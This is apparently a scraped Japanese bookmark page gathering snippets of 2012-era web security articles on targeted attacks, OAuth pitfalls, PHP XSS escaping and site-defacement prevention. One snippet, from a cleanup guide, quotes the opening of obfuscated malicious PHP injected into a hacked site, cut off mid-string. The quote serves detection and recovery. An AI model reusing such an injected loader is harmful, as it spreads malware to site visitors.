標的型サイバー攻撃は防げる?
今、日本の企業は、狙われている。いや、正確には日本の企業が持つ知的財産である、機密情報が狙われている。連日、被害にあった有名企業や組織の名前がメディアの紙面上に踊っているのは読者の皆さまもご存じの通りである。 実は、ITを駆使して機密情報を狙う、このような産業スパイ的な行為は、我々セキュリティ専門家の間では、5年以上前からその存在を知られていた。ここにきて、著名な企業が被害に遭い始めたため、メディアへの露出機会が増え、明るみに出るようになった訳だ。 現在、著名な企業が被害に遭い、頭を悩ませているようなケースは、「標的型サイバー攻撃」と言われる攻撃である。第1回のタイトルである「標的型サイバー攻撃は防げる?」に対する結論を先に言ってしまうが、標的型サイバー攻撃は、「攻撃を防ぐ」という従来のアプローチで対策する事はほぼ不可能である。そのため、防げない前提に立ち、理論的にセキュリティ対策を構築し
twitterセキュリティネタまとめ
こちらの更新は終了する予定だったのですが、なぜか移転先がサスペンドされたいたので理由がわかるまではこちらも更新することにします。 どうにも、データ転送量の制限に引っかかるらしく、このままではダメそうなのでAzureWebSiteからは撤退の可能性が高いです(;´Д`) どこか移転先募集中。
twitterセキュリティネタまとめ 2012年02月03日
終わってからが大変みたいでしたがお疲れ様でした。 yoshiokakizaki:遅くなりましたが, #scis2012 ナイトセッションでの発表をYoutubeにアップロードいたしました. http://bit.ly/wUSgyR OAuth単体で認証に使うと危険!ってことらしいです。あくまでOAuthは認可の仕組みであって、認証はしないのでOpenID Connect使えってことですか。 _nat:OAuth 2.0 を認証に使うと、車が通れる程どてかいセキュリティ・ホールが開くよ、と言う良記事。コメントも読み応えあります。Facebook や、その他OAuthログインしているサイトはみんなチェク! thread-safe.com/2012/01/proble… _nat:@_nat あーダメだ。いきなり穴が開いてるし。Facebook login してるサイト、全滅じゃないか?sign
5分でできるPHPセキュリティ対策 - ぼくはまちちゃん!
こんにちはこんにちは!! Webプログラミングしてますか! よく「PHPはセキュリティがダメ」とか言われてるよね。 でもそれって、べつにPHPが悪いんじゃなくて、 たぶん、セキュリティとかが、まだよくわからない人が多いだけなんじゃないかな。 がんばって勉強しようと思っても、なんだか難しい理屈が並んでいたりするしね…。 なので今日は、セキュリティ対策について、 「これだけやっとけば、わりと安全になるよ」ってことを、初心者むけに、大雑把に書いてみます! 理屈がわからなくても、最初はコピペでも、 なにもやらないより、やったほうがきっとマシになる! 1. XSS対策 動的なものを表示するとき、全部エスケープすればokです! (NG) あなたの名前は <?= $name ?> ですね! ↓ (OK) あなたの名前は <?= htmlspecialchars($name, ENT_QUOTES) ?>
脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
セキュリティに関する重要なお知らせ「WEBサイト改ざんの予防策」 - レンタルサーバー「heteml(ヘテムル)」
CMS (CMSとは…)などのプログラムに脆弱性がある場合、悪意を持った攻撃者は、そのプログラムに攻撃を仕掛けます。 攻撃者はそのCMSを利用し、クラッキングツールを設置します。 クラッキングツールとは、同じサーバー内にあるファイルの「パーミッションの変更」や「改ざんコードの埋め込み」「ファイルの設置」等の改ざんに用いられているものです。そのクラッキングツールによってファイルが改ざんされ、スパムメールを大量に送信させられてしまう問題が発生します。 また、悪意のあるページへ自動的に遷移させられてしまう問題が発生するケースもあります。 原因の対応方法 下記の方法を確認して適切な対応を行なってください。 WAFを有効にする CMSは常に最新のバージョンをご利用し、管理できないサイトは閉鎖する CMS管理画面のパスワードを推測されにくいものにする パーミッションの設定を正しく行なってください FT
PHP セーフモードの束縛
WordPress ユーザの間ではおなじみ「セーフモードの束縛」。 WP のプラグインを動かすと、 Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 10358 is not allowed to access cache-phase2.php on line 79 なーんてでちゃって、げんなりという例のアレです。 有名なサーバでは XREA さんがこの PHP のセーフモードに対応しています。 これってなにがセーフなのか、いれてないと何がやばいのか、あほな言葉で解説しているサイトもあまりなさそうなので、おばかな hiromasa.zone でそっと書いてみます。 🙂 セーフモードを説明をするには、まずはファイルパーミッション (FTP で777 とか 6
旧・Macの手書き説明書 - FC2 BLOG パスワード認証
ブログ パスワード認証 閲覧するには管理人が設定した パスワードの入力が必要です。 管理人からのメッセージ https://mac-tegaki.comへ移転中 閲覧パスワード Copyright © since 1999 FC2 inc. All Rights Reserved.
atword.jp - このウェブサイトは販売用です! - リソースおよび情報
このウェブサイトは販売用です! atword.jp は、あなたがお探しの情報の全ての最新かつ最適なソースです。一般トピックからここから検索できる内容は、atword.jpが全てとなります。あなたがお探しの内容が見つかることを願っています!
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
yuga.jsのXSS直したバージョンがなかなかリリースされないので勝手に直したやつ
http://japan.internet.com/wmnews/20120307/4.html
「ウイルスバスター for Mac 重い」についての続報:Touch and Go:ITmedia オルタナティブ・ブログ
サイフにやさしいSSL証明書 by エスロジカル
bloggers-network283.com
サイト改ざん被害「hacked by VM HaCkEr 」大流行の予感 | STOPN' LISTEN